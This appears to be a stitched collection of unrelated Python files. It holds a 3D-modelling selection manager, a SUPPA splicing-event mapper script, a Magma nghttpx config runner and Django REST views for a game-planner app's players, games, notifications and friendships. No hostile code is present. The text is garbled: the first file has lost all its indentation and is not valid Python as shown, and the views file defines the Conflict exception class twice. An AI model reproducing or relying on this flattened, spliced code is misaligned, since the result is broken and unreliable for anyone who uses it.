def __select(self, obj_lvl, ignore_transform=False):
if obj_lvl == "normal":
obj = Mgr.get("vert", self._color_id)
else:
obj = Mgr.get(obj_lvl, self._color_id)
if obj_lvl == "vert":
obj = obj.merged_vertex if obj else None
elif obj_lvl == "edge":
obj = obj.merged_edge if obj else None
elif obj_lvl == "normal":
obj = obj.shared_normal if obj else None
selection = self._selections[obj_lvl]
can_select_single = False
start_mouse_checking = False
op = self._selection_op
if obj:
if op == "replace":
if GD["active_transform_type"] and not ignore_transform:
if obj in selection and len(selection) > 1:
# When the user clicks one of multiple selected objects, updating the
# selection must be delayed until it is clear whether he wants to
# transform the entire selection or simply have only this object
# selected (this is determined by checking if the mouse has moved at
# least a certain number of pixels by the time the left mouse button
# is released).
can_select_single = True
else:
selection.replace(obj.special_selection)
start_mouse_checking = True
else:
selection.replace(obj.special_selection)
elif op == "add":
selection.add(obj.special_selection)
transform_allowed = GD["active_transform_type"]
if transform_allowed:
start_mouse_checking = True
elif op == "remove":
selection.remove(obj.special_selection)
elif op == "toggle":
old_sel = set(selection)
new_sel = set(obj.special_selection)
selection.replace(old_sel ^ new_sel)
if obj in selection:
transform_allowed = GD["active_transform_type"]
else:
transform_allowed = False
if transform_allowed:
start_mouse_checking = True
elif op == "replace":
selection.clear()
Mgr.update_remotely("selection_set", "hide_name")
return can_select_single, start_mouse_checking
def __select_single(self, obj_lvl):
# If multiple objects were selected and no transformation occurred, a single
# object has been selected out of that previous selection.
if obj_lvl == "normal":
obj = Mgr.get("vert", self._color_id)
else:
obj = Mgr.get(obj_lvl, self._color_id)
if obj_lvl == "vert":
obj = obj.merged_vertex if obj else None
elif obj_lvl == "edge":
obj = obj.merged_edge if obj else None
elif obj_lvl == "normal":
obj = obj.shared_normal if obj else None
self._selections[obj_lvl].replace(obj.special_selection)
def __region_select(self, cam, lens_exp, tex_buffer, ellipse_data, mask_tex, op):
obj_lvl = GD["active_obj_level"]
subobjs = {}
index_offset = 0
for obj in Mgr.get("selection_top"):
geom_data_obj = obj.geom_obj.geom_data_obj
obj_type = "vert" if obj_lvl == "normal" else obj_lvl
indexed_subobjs = geom_data_obj.get_indexed_subobjects(obj_type)
for index, subobj in indexed_subobjs.items():
subobjs[index + index_offset] = subobj
geom_data_obj.origin.set_shader_input("index_offset", index_offset)
index_offset += len(indexed_subobjs)
ge = GD.graphics_engine
obj_count = len(subobjs)
region_type = GD["region_select"]["type"]
subobj_edit_options = GD["subobj_edit_options"]
pick_via_poly = subobj_edit_options["pick_via_poly"]
if pick_via_poly:
Mgr.update_locally("picking_via_poly", False)
def region_select_objects(sel, enclose=False):
tex = Texture()
tex.setup_1d_texture(obj_count, Texture.T_int, Texture.F_r32i)
tex.clear_color = (0., 0., 0., 0.)
sh = shaders.region_sel
if "rect" in region_type or "square" in region_type:
fs = sh.FRAG_SHADER_INV if enclose else sh.FRAG_SHADER
elif "ellipse" in region_type or "circle" in region_type:
fs = sh.FRAG_SHADER_ELLIPSE_INV if enclose else sh.FRAG_SHADER_ELLIPSE
else:
fs = sh.FRAG_SHADER_FREE_INV if enclose else sh.FRAG_SHADER_FREE
if obj_lvl == "normal":
sh = shaders.region_sel_normal
vs = sh.VERT_SHADER
gs = sh.GEOM_SHADER
shader = Shader.make(Shader.SL_GLSL, vs, fs, gs)
else:
vs = shaders.region_sel_subobj.VERT_SHADER
shader = Shader.make(Shader.SL_GLSL, vs, fs)
state_np = NodePath("state_np")
state_np.set_shader(shader, 1)
state_np.set_shader_input("selections", tex, read=False, write=True)
if "ellipse" in region_type or "circle" in region_type:
state_np.set_shader_input("ellipse_data", Vec4(*ellipse_data))
elif region_type in ("fence", "lasso", "paint"):
if enclose:
img = PNMImage()
mask_tex.store(img)
img.expand_border(2, 2, 2, 2, (0., 0., 0., 0.))
mask_tex.load(img)
state_np.set_shader_input("mask_tex", mask_tex)
elif enclose:
w_b, h_b = tex_buffer.get_size()
state_np.set_shader_input("buffer_size", Vec2(w_b + 2, h_b + 2))
state = state_np.get_state()
cam.node().initial_state = state
ge.render_frame()
if ge.extract_texture_data(tex, GD.window.get_gsg()):
texels = memoryview(tex.get_ram_image()).cast("I")
if obj_lvl == "edge":
sel_edges_by_border = subobj_edit_options["sel_edges_by_border"]
for i, mask in enumerate(texels):
for j in range(32):
if mask & (1 << j):
index = 32 * i + j
subobj = subobjs[index].merged_subobj
if not sel_edges_by_border or len(subobj) == 1:
sel.update(subobj.special_selection)
elif obj_lvl == "normal":
for i, mask in enumerate(texels):
for j in range(32):
if mask & (1 << j):
index = 32 * i + j
subobj = subobjs[index].shared_normal
sel.update(subobj.special_selection)
else:
for i, mask in enumerate(texels):
for j in range(32):
if mask & (1 << j):
index = 32 * i + j
subobj = subobjs[index].merged_subobj
sel.update(subobj.special_selection)
state_np.clear_attrib(ShaderAttrib)
new_sel = set()
region_select_objects(new_sel)
ge.remove_window(tex_buffer)
if GD["region_select"]["enclose"]:
w_b, h_b = tex_buffer.get_size()
bfr_exp = GD.window.make_texture_buffer("tex_buffer_exp", w_b + 4, h_b + 4)
GD.showbase.make_camera(bfr_exp, useCamera=cam)
cam.node().set_lens(lens_exp)
inverse_sel = set()
region_select_objects(inverse_sel, True)
new_sel -= inverse_sel
ge.remove_window(bfr_exp)
if pick_via_poly:
Mgr.update_locally("picking_via_poly", True)
selection = self._selections[obj_lvl]
if op == "replace":
selection.replace(new_sel)
elif op == "add":
selection.add(new_sel)
elif op == "remove":
selection.remove(new_sel)
elif op == "toggle":
old_sel = set(selection)
selection.replace(old_sel ^ new_sel)
def __set_subobj_picking_via_poly(self, via_poly=False):
GD["subobj_edit_options"]["pick_via_poly"] = via_poly
if not via_poly:
models = Mgr.get("model_objs")
for model in models:
if model.geom_type == "unlocked_geom":
geom_data_obj = model.geom_obj.geom_data_obj
geom_data_obj.restore_selection_backup("poly")
obj_lvl = GD["active_obj_level"]
if obj_lvl not in ("vert", "edge", "normal"):
return
for obj in Mgr.get("selection_top"):
if obj.type == "model" and obj.geom_type == "unlocked_geom":
obj.geom_obj.geom_data_obj.init_subobj_picking(obj_lvl)
def __init_selection_via_poly(self, picked_poly, op):
if picked_poly:
Mgr.get("transf_gizmo").set_pickable(False)
self._picked_poly = picked_poly
self._selection_op = op
Mgr.enter_state("picking_via_poly")
def __init_subobj_picking_via_poly(self, prev_state_id, active):
Mgr.add_task(self.__hilite_subobj, "hilite_subobj")
Mgr.remove_task("update_cursor")
subobj_lvl = GD["active_obj_level"]
if subobj_lvl == "edge" and GD["subobj_edit_options"]["sel_edges_by_border"]:
category = "border"
else:
category = ""
geom_data_obj = self._picked_poly.geom_data_obj
geom_data_obj.init_subobj_picking_via_poly(subobj_lvl, self._picked_poly, category)
# temporarily select picked poly
geom_data_obj.update_selection("poly", [self._picked_poly], [], False)
for model in Mgr.get("selection_top"):
other_geom_data_obj = model.geom_obj.geom_data_obj
if other_geom_data_obj is not geom_data_obj:
other_geom_data_obj.set_pickable(False)
Mgr.update_app("status", ["picking_via_poly"])
cs_type = GD["coord_sys_type"]
tc_type = GD["transf_center_type"]
toplvl_obj = self._picked_poly.toplevel_obj
if cs_type == "local":
Mgr.update_locally("coord_sys", cs_type, toplvl_obj)
if tc_type == "pivot":
Mgr.update_locally("transf_center", tc_type, toplvl_obj)
def __hilite_subobj(self, task):
pixel_under_mouse = Mgr.get("pixel_under_mouse")
active_transform_type = GD["active_transform_type"]
if self._pixel_under_mouse != pixel_under_mouse:
if pixel_under_mouse == VBase4():
if active_transform_type and self._tmp_color_id is not None:
self.__select_subobj_via_poly(transform=True)
return
else:
r, g, b, a = [int(round(c * 255.)) for c in pixel_under_mouse]
color_id = r << 16 | g << 8 | b
geom_data_obj = self._picked_poly.geom_data_obj
subobj_lvl = GD["active_obj_level"]
# highlight temporary subobject
if geom_data_obj.hilite_temp_subobject(subobj_lvl, color_id):
self._tmp_color_id = color_id
self._pixel_under_mouse = pixel_under_mouse
color = tuple(round(c * 255.) for c in pixel_under_mouse)
not_hilited = color in ((0., 0., 0., 0.), (255., 255., 255., 255.))
cursor_id = "main" if not_hilited else ("select" if not active_transform_type
else active_transform_type)
if GD["subobj_edit_options"]["pick_by_aiming"]:
aux_pixel_under_mouse = Mgr.get("aux_pixel_under_mouse")
if not_hilited or self._aux_pixel_under_mouse != aux_pixel_under_mouse:
if not_hilited and aux_pixel_under_mouse != VBase4():
r, g, b, a = [int(round(c * 255.)) for c in aux_pixel_under_mouse]
color_id = r << 16 | g << 8 | b
geom_data_obj = self._picked_poly.geom_data_obj
subobj_lvl = GD["active_obj_level"]
# highlight temporary subobject
if geom_data_obj.hilite_temp_subobject(subobj_lvl, color_id):
self._tmp_color_id = color_id
cursor_id = "select" if not active_transform_type else active_transform_type
self._aux_pixel_under_mouse = aux_pixel_under_mouse
if self._cursor_id != cursor_id:
Mgr.set_cursor(cursor_id)
self._cursor_id = cursor_id
return task.cont
def __select_subobj_via_poly(self, transform=False):
Mgr.remove_task("hilite_subobj")
Mgr.enter_state("selection_mode")
subobj_lvl = GD["active_obj_level"]
geom_data_obj = self._picked_poly.geom_data_obj
if self._tmp_color_id is None:
obj = None
else:
if subobj_lvl == "vert":
vert_id = Mgr.get("vert", self._tmp_color_id).id
obj = geom_data_obj.get_merged_vertex(vert_id)
elif subobj_lvl == "edge":
edge_id = Mgr.get("edge", self._tmp_color_id).id
obj = geom_data_obj.get_merged_edge(edge_id)
obj = (None if GD["subobj_edit_options"]["sel_edges_by_border"]
and len(obj) > 1 else obj)
elif subobj_lvl == "normal":
vert_id = Mgr.get("vert", self._tmp_color_id).id
obj = geom_data_obj.get_shared_normal(vert_id)
self._color_id = obj.picking_color_id if obj else None
ignore_transform = not transform
self.__select(subobj_lvl, ignore_transform)
geom_data_obj.prepare_subobj_picking_via_poly(subobj_lvl)
for model in Mgr.get("selection_top"):
other_geom_data_obj = model.geom_obj.geom_data_obj
if other_geom_data_obj is not geom_data_obj:
other_geom_data_obj.set_pickable()
self._picked_poly = None
self._tmp_color_id = None
self._cursor_id = ""
self._pixel_under_mouse = None
self._aux_pixel_under_mouse = None
active_transform_type = GD["active_transform_type"]
if transform and obj and obj.geom_data_obj.is_selected(obj):
if active_transform_type == "translate":
picked_point = obj.get_center_pos(GD.world)
elif GD.mouse_watcher.has_mouse():
screen_pos = Point2(GD.mouse_watcher.get_mouse())
picked_point = obj.get_point_at_screen_pos(screen_pos)
else:
picked_point = None
if picked_point:
selection = self._selections[subobj_lvl]
selection.update(hide_sets=True)
Mgr.do("init_transform", picked_point)
Mgr.set_cursor(active_transform_type)
if active_transform_type:
Mgr.get("transf_gizmo").set_pickable()
def __cancel_select_via_poly(self):
Mgr.remove_task("hilite_subobj")
Mgr.enter_state("selection_mode")
subobj_lvl = GD["active_obj_level"]
geom_data_obj = self._picked_poly.geom_data_obj
geom_data_obj.prepare_subobj_picking_via_poly(subobj_lvl)
for model in Mgr.get("selection_top"):
other_geom_data_obj = model.geom_obj.geom_data_obj
if other_geom_data_obj is not geom_data_obj:
other_geom_data_obj.set_pickable()
self._picked_poly = None
self._tmp_color_id = None
self._cursor_id = ""
self._pixel_under_mouse = None
self._aux_pixel_under_mouse = None
if GD["active_transform_type"]:
Mgr.get("transf_gizmo").set_pickable()
def __convert_subobj_selection_touching(self, next_subobj_lvl):
subobj_lvl = GD["active_obj_level"]
self._next_selection = next_sel = set()
selection = self._selections[subobj_lvl]
if not selection:
return
if next_subobj_lvl == "normal":
for subobj in selection:
next_sel.update(v.shared_normal for v in subobj.connected_verts)
else:
for subobj in selection:
next_sel.update(s.merged_subobj for s in
subobj.get_connected_subobjs(next_subobj_lvl))
def __convert_subobj_selection_containing(self, next_subobj_lvl):
lvls = {"vert": 0, "normal": 0, "edge": 1, "poly": 2}
subobj_lvl = GD["active_obj_level"]
self._next_selection = next_sel = set()
selection = self._selections[subobj_lvl]
if not selection:
return
if subobj_lvl == "edge" and next_subobj_lvl == "normal":
for merged_edge in selection:
next_sel.update(v.shared_normal for v in merged_edge.vertices)
elif subobj_lvl == "poly" and next_subobj_lvl == "normal":
for poly in selection:
next_sel.update(v.shared_normal for v in poly.vertices)
elif subobj_lvl == "poly" and next_subobj_lvl == "edge":
for poly in selection:
next_sel.update(e.merged_edge for e in poly.edges)
elif lvls[next_subobj_lvl] > lvls[subobj_lvl]:
if next_subobj_lvl == "edge":
for subobj in selection:
if subobj_lvl == "vert":
next_sel.update(e.merged_edge for e in subobj.connected_edges
if all(v.merged_vertex in selection for v in e.vertices))
else: # subobj_lvl == "normal"
next_sel.update(e.merged_edge for e in subobj.connected_edges
if all(v.shared_normal in selection for v in e.vertices))
else: # next_subobj_lvl == "poly"
for subobj in selection:
if subobj_lvl == "vert":
next_sel.update(p for p in subobj.connected_polys
if all(v.merged_vertex in selection for v in p.vertices))
elif subobj_lvl == "normal":
next_sel.update(p for p in subobj.connected_polys
if all(v.shared_normal in selection for v in p.vertices))
else: # subobj_lvl == "edge"
next_sel.update(p for p in subobj.connected_polys
if all(e.merged_edge in selection for e in p.edges))
else:
self.__convert_subobj_selection_touching(next_subobj_lvl)
def __convert_subobj_selection_bordering(self, next_subobj_lvl):
lvls = {"vert": 0, "normal": 0, "edge": 1, "poly": 2}
subobj_lvl = GD["active_obj_level"]
selection = self._selections[subobj_lvl]
if not selection:
return
if subobj_lvl == "poly":
poly_set = set(selection)
else:
self.__convert_subobj_selection_containing("poly")
poly_set = self._next_selection
def is_border_edge(edge):
polys = edge.geom_data_obj.get_subobjects("poly")
return len(set(polys[p_id] for p_id in edge.merged_edge.polygon_ids)
& poly_set) == 1
border_edges = (e for p in poly_set for e in p.edges if is_border_edge(e))
if next_subobj_lvl == "normal":
self._next_selection = set(v.shared_normal for e in border_edges
for v in e.vertices)
elif next_subobj_lvl == "vert":
self._next_selection = set(v.merged_vertex for e in border_edges
for v in e.vertices)
elif next_subobj_lvl == "edge":
self._next_selection = set(e.merged_edge for e in border_edges)
else: # next_subobj_lvl == "poly"
self._next_selection = set(e.polygon for e in border_edges)
def __convert_subobj_selection(self, next_subobj_lvl, conversion_type):
if conversion_type == "touching":
self.__convert_subobj_selection_touching(next_subobj_lvl)
elif conversion_type == "containing":
self.__convert_subobj_selection_containing(next_subobj_lvl)
elif conversion_type == "bordering":
self.__convert_subobj_selection_bordering(next_subobj_lvl)
MainObjects.add_class(SelectionManager)
|
StarcoderdataPython
|
6494588
|
<filename>AS2SegsMapper.py
import sys
import logging
from argparse import ArgumentParser, RawTextHelpFormatter
from lib.Seg2EventMapper import generateEventsSegsIOE
# Basic logging setup so the completion message in main() is actually emitted
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
description = \
"Description:\n\n" + \
"This subcommand Maps alternative splicing events to their respective " + \
"inclusion/exclusion segments"
parser = ArgumentParser(description=description, formatter_class=RawTextHelpFormatter,
add_help=False)
parser.add_argument("-fa", "--segments-file", help="specify segments FASTA file",
required=True)
parser.add_argument("-ioe", "--events-file", help="specify events annotation file (.ioe file generated by SUPPA)",
required=True)
parser.add_argument("-o", "--output-dir", help="specify output path", required=True)
def main():
args = parser.parse_args()
generateEventsSegsIOE(args.segments_file, args.events_file, args.output_dir)
logger.info("Done")
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
1736542
|
#!/usr/bin/env python3
#
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import argparse
import logging
import os
import subprocess
from typing import Any, Dict
import jinja2
import yaml
CONFIGS_DIR = "/etc/magma/configs"
TEMPLATES_DIR = "/etc/magma/templates"
OUTPUT_DIR = "/etc/nghttpx"
OBSIDIAN_PORT = 9081
def _load_services() -> Dict[Any, Any]:
""" Return the services from the registry configs of all modules """
services = {} # type: Dict[Any, Any]
modules = os.listdir(CONFIGS_DIR)
for module in modules:
print("Loading registry for module: %s..." % module)
filename = os.path.join(CONFIGS_DIR, module, "service_registry.yml")
with open(filename) as file:
registry = yaml.safe_load(file)
if registry and "services" in registry:
services.update(registry["services"])
return services
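# Each module's service_registry.yml is assumed to look roughly like (hypothetical sketch):
#   services:
#     <service_name>: {...}   # entries consumed by the nghttpx template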
def _generate_config(proxy_type: str, context: Dict[str, Any]) -> str:
""" Generate the nghttpx config from the template """
loader = jinja2.FileSystemLoader(TEMPLATES_DIR)
env = jinja2.Environment(loader=loader)
template = env.get_template("nghttpx_%s.conf.j2" % proxy_type)
output = template.render(context)
outfile = os.path.join(OUTPUT_DIR, "nghttpx_%s.conf" % proxy_type)
with open(outfile, "w") as file:
file.write(output)
return outfile
def _run_nghttpx(conf: str) -> None:
""" Runs the nghttpx process given the config file """
try:
subprocess.run(
[
"/usr/local/bin/nghttpx",
"--conf=%s" % conf,
"/var/opt/magma/certs/controller.key",
"/var/opt/magma/certs/controller.crt",
], check=True,
)
except subprocess.CalledProcessError as err:
exit(err.returncode)
def main() -> None:
parser = argparse.ArgumentParser(description="Nghttpx runner")
parser.add_argument("proxy_type", choices=["open", "clientcert"])
args = parser.parse_args()
# Create the jinja context
context = {} # type: Dict[str, Any]
context["service_registry"] = _load_services()
context["controller_hostname"] = os.environ["CONTROLLER_HOSTNAME"]
context["proxy_backends"] = os.environ["PROXY_BACKENDS"]
context["obsidian_port"] = OBSIDIAN_PORT
context["env"] = os.environ
# Generate the nghttpx config
conf = _generate_config(args.proxy_type, context)
# Run the nghttpx process
_run_nghttpx(conf)
logging.error("nghttpx restarting")
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3278470
|
import re
from rest_framework import generics
from rest_framework import permissions
from rest_framework import exceptions
from rest_framework import status
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from django.contrib.auth.models import User
from django.db.models import Q
from django.utils import timezone
from game_planner_api.serializers import PlayerSerializer, GameSerializer, GameExSerializer, NotificationSerializer, FriendshipSerializer, GameParticipationRequestSerializer
from .models import Player, Game, NotificationType, Notification, Friendship, GameParticipationRequest
class Conflict(exceptions.APIException):
    """HTTP 409 error raised when a request conflicts with the current state of a resource."""
    status_code = status.HTTP_409_CONFLICT
    default_detail = 'Request conflicts with the current state of the resource.'
    default_code = 'conflict'
class IndirectModelMixin:
# TODO: use GenericAPIView::super() instead of dupe code
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
indirect_field = get_object_or_404(self.indirect_model, **filter_kwargs)
# May raise a permission denied
self.check_object_permissions(self.request, indirect_field)
if indirect_field:
indirect_lookup = {self.indirect_lookup_field: indirect_field}
obj = get_object_or_404(queryset, **indirect_lookup)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
class PlayerList(generics.ListAPIView):
queryset = Player.objects.all()
serializer_class = PlayerSerializer
class PlayerDetail(IndirectModelMixin,
generics.RetrieveUpdateAPIView):
lookup_field = 'username'
indirect_lookup_field = 'user'
indirect_model = User
queryset = Player.objects.all()
serializer_class = PlayerSerializer
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
request_json = self.request.data
user = self.request.user
# Authenticated user removes {username} as friend
if 'action' in request_json and request_json['action'] == "remove_friend":
requester_player = Player.objects.get(user=user)
user_to_remove = User.objects.get(username=self.kwargs['username'])
player_to_remove = Player.objects.get(user=user_to_remove)
are_friends = player_to_remove in requester_player.friends.all()
if not are_friends:
raise exceptions.NotFound(detail="You are not %s's friend." % self.kwargs['username'])
requester_player.friends.remove(player_to_remove)
# Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
user=player_to_remove.user,
read=False)
if notification:
notification.delete()
serializer.save()
# Authenticated player updates his info
if 'action' in request_json and request_json['action'] == "update_player":
user_to_update = User.objects.get(username=self.kwargs['username'])
if not user_to_update == user:
raise exceptions.PermissionDenied()
if 'first_name' in request_json and len(request_json['first_name']) > 30:
raise exceptions.ParseError(detail="'first_name' must be a string with 30 characters or fewer.")
if 'last_name' in request_json and len(request_json['last_name']) > 150:
raise exceptions.ParseError(detail="'last_name' must be a string with 150 characters or fewer.")
if 'email' in request_json and request_json['email'] and not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", request_json['email']):
raise exceptions.ParseError(detail="Invalid 'email' address.")
            if request_json.get('first_name'):
                user.first_name = request_json['first_name']
            if request_json.get('last_name'):
                user.last_name = request_json['last_name']
            if request_json.get('email'):
                user.email = request_json['email']
user.save()
else:
raise exceptions.ParseError()
class GameList(generics.ListAPIView):
queryset = Game.objects.all()
serializer_class = GameSerializer
def get_queryset(self):
"""
Excludes games that user does not have permission to see.
"""
qs = super().get_queryset()
filter_q = Q(private=False)
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
# Get player's games list
player = Player.objects.get(user=user)
filter_q = filter_q | Q(admin=user) | Q(players=player)
return qs.filter(filter_q).distinct()
class GameDetailPermission(permissions.BasePermission):
"""
Public games can be seen by unauthenticated users
Private games can only be seen by participating players or admin
Games can be changed by game admin
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
authorized = not obj.private
if request.user and request.user.is_authenticated:
player = Player.objects.get(user=request.user)
is_admin = (request.user == obj.admin)
participating = (player in obj.players.all())
authorized = authorized or is_admin or participating
return authorized
# admin user can use non safe methods
return obj.admin == request.user
class GameDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'game_id'
queryset = Game.objects.all()
serializer_class = GameExSerializer
permission_classes = [GameDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
game = Game.objects.get(game_id=self.kwargs['game_id'])
if 'action' in self.request.data and self.request.data['action'] == 'add_player' and 'username' in self.request.data:
user_to_add = User.objects.filter(username=self.request.data['username'])
if not user_to_add:
raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
player_to_add = Player.objects.get(user=user_to_add[0])
if player_to_add in game.players.all():
raise Conflict(detail="'%s' is already participating in '%s'." % (self.request.data['username'], game.name))
game.players.add(player_to_add)
elif 'action' in self.request.data and self.request.data['action'] == 'remove_player' and 'username' in self.request.data:
user_to_remove = User.objects.filter(username=self.request.data['username'])
if not user_to_remove:
raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
player_to_remove = Player.objects.get(user=user_to_remove[0])
            if player_to_remove not in game.players.all():
raise Conflict(detail="'%s' is not participating in '%s'." % (self.request.data['username'], game.name))
game.players.remove(player_to_remove)
else:
raise exceptions.ParseError()
class NotificationList(generics.ListAPIView):
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
def get_queryset(self):
"""
Only show notifications of authenticated user.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
return qs.filter(user=user)
permission_classes = [permissions.IsAuthenticated]
class NotificationDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return obj.user == request.user
class NotificationDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
permission_classes = [permissions.IsAuthenticated, NotificationDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH and DELETE requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
notification = Notification.objects.get(id=self.kwargs['id'])
if not self.request.user == notification.user:
raise exceptions.PermissionDenied()
if 'action' in self.request.data and self.request.data['action'] == 'mark_as_read':
if not notification.read_datetime:
serializer.save(read=True,
read_datetime=timezone.now())
elif 'action' in self.request.data and self.request.data['action'] == 'mark_as_unread':
serializer.save(read=False,
read_datetime=None)
else:
raise exceptions.ParseError()
class Conflict(exceptions.APIException):
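    """Custom DRF exception rendered as an HTTP 409 Conflict response."""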
status_code = 409
default_detail = 'Conflict'
default_code = 'conflict'
class FriendshipList(generics.ListCreateAPIView):
queryset = Friendship.objects.all()
serializer_class = FriendshipSerializer
permission_classes = [permissions.IsAuthenticated]
def get_queryset(self):
"""
Only show friend requests of authenticated user.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
player = Player.objects.get(user=user)
friendship_type = self.request.query_params.get('type', None)
if friendship_type is not None:
if friendship_type == "incoming":
return qs.filter(Q(request_to=player) & Q(state__isnull=True))
elif friendship_type == "outgoing":
return qs.filter(Q(request_from=player) & Q(state__isnull=True))
elif friendship_type == "active":
return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
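            # Default: pending requests (state is NULL) plus active friendships involving this player.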
return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state__isnull=True)) | ((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
def perform_create(self, serializer):
request_json = self.request.data
user = self.request.user
        if 'username' not in request_json:
raise exceptions.ParseError(detail="\"username\" body parameter missing.")
requester_player = Player.objects.get(user=user)
requested_user = User.objects.filter(username=request_json['username'])
if not requested_user:
raise exceptions.NotFound(detail="Player %s not found." % request_json['username'])
requested_player = Player.objects.get(user=requested_user[0])
if requester_player == requested_player:
raise exceptions.PermissionDenied(detail="A player cannot add himself as a friend.")
outgoing_request = Friendship.objects.filter(request_from=requester_player, request_to=requested_player, state__isnull=True)
incoming_request = Friendship.objects.filter(request_from=requested_player, request_to=requester_player, state__isnull=True)
active_request = outgoing_request or incoming_request
if active_request:
raise Conflict(detail="An active friend request already exists between those users.")
already_friends = requested_player in list(requester_player.friends.all())
if already_friends:
            raise Conflict(detail="Players are already friends with each other.")
request_datetime = timezone.now()
notification = Notification(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=request_datetime,
sender=requester_player.user,
user=requested_player.user)
notification.save()
serializer.save(request_from=requester_player,
request_to=requested_player,
request_datetime=request_datetime)
class FriendshipDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
requester_user = User.objects.get(username=obj.request_from.user.username)
requested_user = User.objects.get(username=obj.request_to.user.username)
        return request.user == requested_user or request.user == requester_user
class FriendshipDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
queryset = Friendship.objects.all()
serializer_class = FriendshipSerializer
permission_classes = [permissions.IsAuthenticated, FriendshipDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
friend_request = Friendship.objects.get(id=self.kwargs['id'])
if not ((self.request.user == friend_request.request_from.user or self.request.user == friend_request.request_to.user) and not friend_request.state):
raise exceptions.PermissionDenied()
if self.request.user == friend_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if notification:
notification.delete()
serializer.save(state="CANCELED",
action_taken_datetime=timezone.now())
elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'accept':
request_datetime = timezone.now()
# Add to player's friends list and send notification to new friend
player = Player.objects.get(user=self.request.user)
player.friends.add(friend_request.request_from)
notification = Notification(notification_type=NotificationType.ADDED_AS_FRIEND.value,
creation_datetime=request_datetime,
sender=player.user,
user=friend_request.request_from.user)
notification.save()
# Mark friend request notification as read if it still is unread
friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if friend_request_notification:
friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
friend_request_notification.read = True
friend_request_notification.read_datetime = request_datetime
friend_request_notification.save()
# Update friend_request state and save datetime of action_taken
serializer.save(state="ACTIVE",
action_taken_datetime=request_datetime)
elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'decline':
request_datetime = timezone.now()
# Mark friend request notification as read if it still is unread
friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if friend_request_notification:
friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
friend_request_notification.read = True
friend_request_notification.read_datetime = request_datetime
friend_request_notification.save()
# Update friend_request state and save datetime of action_taken
serializer.save(state="DECLINED",
action_taken_datetime=request_datetime)
else:
raise exceptions.ParseError()
"""
TODO: let client DELETE friendships using /friendships/{username} instead of /friendships/{id}
"""
def perform_destroy(self, instance):
# Remove player from friends in the Player model
user = self.request.user
requester_player = Player.objects.get(user=user)
friend_request = Friendship.objects.get(id=self.kwargs['id'])
if not friend_request.state == "ACTIVE":
raise exceptions.PermissionDenied()
if friend_request.request_from == requester_player:
player_to_remove = friend_request.request_to
else:
player_to_remove = friend_request.request_from
requester_player.friends.remove(player_to_remove)
# Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
user=player_to_remove.user,
read=False)
if notification:
notification.delete()
# Delete active Friendship instance
instance.delete()
